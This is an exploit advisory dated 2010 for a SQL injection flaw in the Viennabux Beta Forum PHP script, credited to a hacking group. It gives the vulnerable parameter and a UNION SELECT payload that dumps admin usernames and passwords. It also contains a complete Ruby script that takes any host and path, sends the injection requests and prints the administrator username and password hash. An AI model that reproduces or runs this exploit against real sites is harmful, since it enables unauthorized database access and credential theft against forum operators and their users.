----------------------------Information------------------------------------------------ +Name : Viennabux Beta Forum <= SQL injection Vulnerability & SQL injection Exploit +Autor : Easy Laster +Date : 09.04.2010 +Script : Viennabux Beta Forum +Download : ----------- +Demo : www.viennabux.com +Price : -------- +Language : PHP +Discovered by Easy Laster +Security Group 4004-Security-Project 4004-security-project.com +Greetz to Team-Internet ,Underground Agents +And all Friends of Cyberlive : R!p,Eddy14,Silent Vapor,Nolok, Kiba,-tmh-,Dr.ChAoS,HANN!BAL,Kabel,-=Player=-,Lidloses_Auge, N00bor,Ic3Drag0n,novaca!ne,n3w7u,Maverick010101.. --------------------------------------------------------------------------------------- ___ ___ ___ ___ _ _ _____ _ _ | | | | | | |___ ___ ___ ___ _ _ ___|_| |_ _ _ ___| _ |___ ___ |_|___ ___| |_ |_ | | | | |_ |___|_ -| -_| _| | | _| | _| | |___| __| _| . | | | -_| _| _| |_|___|___| |_| |___|___|___|___|_| |_|_| |_ | |__| |_| |___|_| |___|___|_| |___| |___| ---------------------------------------------------------------------------------------- +Vulnerability : http://www.site.com/forum/view_topic.php?cat= +SQL Injection +Exploitable : http://www.site.com/forum/view_topic.php?cat=1+union+select+1,concat (aUsername,0x3a,apassword),3,4,5,6,7+from+admins ---------------------------------------------------------------------------------------- #!/usr/bin/ruby #4004-security-project.com #Welcome to my first ruby SQL injection exploit #Discovered and vulnerability by Easy Laster print " ######################################################### # 4004-Security-Project # ######################################################### # Viennabux Beta Forum Sql injection # # Exploit # # Using Host+Path+prefix # # www.demo.de /forum/ # # Easy Laster # ######################################################### " require 'net/http' print "#########################################################" print "\nEnter host name (site.com)->" host=gets.chomp print "#########################################################" print "\nEnter script path (/forum/)->" path=gets.chomp print "\n#########################################################" begin dir = 'view_topic.php?cat=1+union+select+1,concat(0x23,0x23,0x23,0x23,0x23,aUsername,0x23,0x23,0x23,0x23,0x23),3,4,5,6,7+from+admins' http = Net::HTTP.new(host, 80) resp= http.get(path+dir) print "\nUsername -> "+(/#####(.+)#####/).match(resp.body)[1] dir = 'view_topic.php?cat=1+union+select+1,concat(0x23,0x23,0x23,0x23,0x23,apassword,0x23,0x23,0x23,0x23,0x23),3,4,5,6,7+from+admins' http = Net::HTTP.new(host, 80) resp= http.get(path+dir) print "\nPassword Hash -> "+(/#####(.+)#####/).match(resp.body)[1] print "\n#########################################################" rescue print "\nExploit failed" end